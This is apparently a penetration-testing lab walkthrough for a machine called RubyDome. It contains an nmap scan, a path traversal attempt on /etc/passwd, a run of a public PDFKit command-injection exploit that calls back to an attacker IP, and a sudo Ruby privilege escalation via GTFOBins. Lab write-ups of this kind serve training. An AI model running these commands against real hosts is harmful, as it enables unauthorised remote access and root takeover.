WDavid404
commented
1 month ago PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
3000/tcp open http syn-ack ttl 61 WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07))
| http-methods:
|_ Supported Methods: GET HEAD
|_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
|_http-title: RubyDome HTML to PDFWEBrick httpd 1.7.0 --> https://www.exploit-db.com/exploits/5215 (Ruby 1.8.6/1.9 (WEBick HTTPd 1.3.1) - Directory Traversal) --> version info doesn:t match. Try it (http://192.168.218.22:3000/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd) --> doesn't work...
On 3000/tcp web page, Input http://127.0.0.1
--->
Search PDFKit exploit --> https://www.exploit-db.com/exploits/51293 (pdfkit v0.8.7.2 - Command Injection)
We don't know PDFKit version, but try it..
python3 51293.py -s 192.168.45.180 80 -w http://192.168.218.22:3000/pdf -p url
(From burpsuite, we know the URL is /pdf not /pdf/ and "-p (parameter)" should be "url" )
--> work!
PE:
sudo -l
-->
According to https://gtfobins.github.io/gtfobins/ruby/#sudo
echo 'exec "/bin/sh"'>/home/andrew/app/app.rb
sudo /usr/bin/ruby /home/andrew/app/app.rb
Key points: